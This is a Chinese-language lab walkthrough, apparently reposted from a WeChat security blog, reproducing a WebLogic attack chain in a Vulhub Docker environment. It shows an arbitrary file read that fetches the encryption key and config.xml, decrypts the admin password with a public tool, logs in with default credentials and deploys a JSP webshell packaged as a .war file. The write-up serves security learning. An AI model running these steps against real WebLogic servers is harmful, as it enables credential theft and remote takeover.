漏洞介绍
Weblogic是美国Oracle公司出品的一个应用服务器(application server),一个基于java EE的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。本次漏洞复现是通过任意文件读取漏洞,可利用此漏洞配合解密工具得到登陆密码,登录后台后存在上传点,可上传一句话拿shell。
复现环境
Kali 2021
漏洞复现
环境搭建
本次使用的是Vulhub。Vulhub是一个基于docker和docker-compose的漏洞环境集合,可用于帮助复现漏洞,既然vulhub是基于docker的,那首先需要安装docker,安装docker的详细步骤可以参考
https://www.cnblogs.com/lxfweb/p/12952490.html
安装好docker后,拉取vulhub环境
git clone https://github.com/vulhub/vulhub.git
更新vulhub
git pull
启动漏洞环境
cd /vulhub/weblogic/weak_password
docker-compose up -d
weblogic任意文件读取漏洞中,weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可;这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml;
首先需要获取到密钥
SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符
访问
172.16.XX.XX(靶机IP地址):7001/hello/file.jsp?path=security/SerializedSystemIni.dat
使用burp抓包
在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件
再抓取 config.xml 的包,找到加密后的管理员密码:
172.16.XX.XX:7001/hello/file.jsp?path=config/config.xml
使用解密工具去破解密码,工具下载
https://github.com/TideSec/Decrypt_Weblogic_Password
可以得到weblogic对应的密码
访问http://192.168.3.137:7001/console/login/LoginForm.jsp
输入账号weblogic,Oracle@123登录系统
点击部署→安装→上载文件
上传的文件是 .war文件,使用冰蝎自带的shell.jsp木马制作
jar -cvf blog.war shell.jsp
连接木马
原文始发于微信公众号(赛瑞攻防实验室):Weblogic weak passwprk漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论